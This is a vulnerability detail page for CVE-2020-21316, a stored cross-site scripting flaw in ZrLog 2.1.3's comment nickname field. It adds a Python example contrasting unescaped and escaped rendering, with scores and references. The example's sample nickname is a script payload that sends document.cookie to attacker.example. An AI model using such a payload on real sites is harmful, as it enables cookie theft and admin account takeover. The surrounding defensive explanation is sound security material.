Vulnerability Details : CVE-2020-21316
A cross-site scripting (XSS) vulnerability exists in the comment section of ZrLog 2.1.3. A remote attacker can inject arbitrary web script via the nickname parameter; the script is stored with the comment and rendered to every user who views it, including an administrator, which allows the attacker to steal administrator cookies and gain access to the admin panel.
Vulnerability category: Cross site scripting (XSS)
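The mechanism above in working form, as an added example that is not ZrLog's code and not taken from the referenced report: a comment renderer that interpolates the nickname unescaped beside the same renderer with HTML output encoding, plus a check on the admin session cookie's flags, since HttpOnly is what keeps an injected script from reading the cookie. The comment payload, the template markup and the cookie name `admin_session` are all constructed for the example.

```python
import html
import re

# Constructed sample comment (not from the original report): the nickname
# field carries a script that exfiltrates document.cookie, the pattern the
# advisory describes for the nickname parameter.
SAMPLE_COMMENT = {
    "nickname": '<script>new Image().src="http://attacker.example/?c="'
                '+document.cookie</script>',
    "content": "Nice post!",
}

# Hypothetical admin session cookie name; ZrLog's real cookie name is not
# stated on the page.
ADMIN_COOKIE = "admin_session"


def render_comment_vulnerable(comment):
    """Stored-XSS pattern: untrusted fields interpolated into HTML unchanged.

    Whatever the commenter typed as nickname is stored and later emitted
    verbatim into the page every reader (including the admin) receives.
    """
    return (f'<div class="comment"><b>{comment["nickname"]}</b>: '
            f'{comment["content"]}</div>')


def render_comment_fixed(comment):
    """Contextual output encoding for the HTML-body context.

    html.escape rewrites < > & " ' so the nickname can only ever be text
    inside <b>...</b>, never a new element or attribute.
    """
    nick = html.escape(comment["nickname"], quote=True)
    body = html.escape(comment["content"], quote=True)
    return f'<div class="comment"><b>{nick}</b>: {body}</div>'


_SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def contains_script_element(rendered_html):
    """True if the rendered fragment still contains a live <script> start tag."""
    return _SCRIPT_TAG.search(rendered_html) is not None


def admin_cookie_header(session_id):
    """Set-Cookie value for the admin session with the flags that blunt
    cookie theft: HttpOnly keeps it out of document.cookie, Secure keeps it
    off plaintext HTTP, SameSite=Lax limits cross-site sending."""
    return f"{ADMIN_COOKIE}={session_id}; Path=/; HttpOnly; Secure; SameSite=Lax"


def cookie_readable_by_script(set_cookie_value):
    """Check a Set-Cookie header value: without HttpOnly, an injected script
    can read the cookie through document.cookie and send it to the attacker."""
    attrs = {part.strip().split("=", 1)[0].lower()
             for part in set_cookie_value.split(";")[1:]}
    return "httponly" not in attrs


if __name__ == "__main__":
    vuln = render_comment_vulnerable(SAMPLE_COMMENT)
    fixed = render_comment_fixed(SAMPLE_COMMENT)
    print("vulnerable render carries <script>:", contains_script_element(vuln))
    print("fixed render carries <script>:     ", contains_script_element(fixed))
    print(fixed)
    print("admin cookie readable by script:",
          cookie_readable_by_script(admin_cookie_header("abc123")))
```

The encoder has to match the output context: `html.escape` is right for text inside an element, but a nickname placed into an attribute value, a URL or inline JavaScript needs that context's encoder. HttpOnly only limits what a successful injection can steal; the fix for the CVE itself is the encoding step.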
Products affected by CVE-2020-21316
- cpe:2.3:a:zrlog:zrlog:2.1.3:*:*:*:*:*:*:*
Exploit prediction scoring system (EPSS) score for CVE-2020-21316
0.11%: probability of exploitation activity in the next 30 days
~42%: percentile, the proportion of vulnerabilities scored at or below this score
CVSS scores for CVE-2020-21316
Base Score | Base Severity | CVSS Vector | Exploitability Score | Impact Score | Score Source | First Seen
---|---|---|---|---|---|---
4.3 | MEDIUM | AV:N/AC:M/Au:N/C:N/I:P/A:N | 8.6 | 2.9 | NIST |
6.1 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | 2.8 | 2.7 | NIST |
CWE ids for CVE-2020-21316
- The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. Assigned by: nvd@nist.gov (Primary)
References for CVE-2020-21316
- https://github.com/94fzb/zrlog/commit/b921c1ae03b8290f438657803eee05226755c941 (Fix #55,#56 xxs inject · 94fzb/zrlog@b921c1a · GitHub) [Patch; Third Party Advisory]
- https://gist.github.com/T-pod/d9405dbd61243990d65d55c5df0fcbe6 (zrlog-xss.md · GitHub) [Patch; Third Party Advisory]
- https://github.com/94fzb/zrlog/issues/56 (Stored XSS in the front-end article comment section · Issue #56 · 94fzb/zrlog · GitHub) [Patch; Third Party Advisory]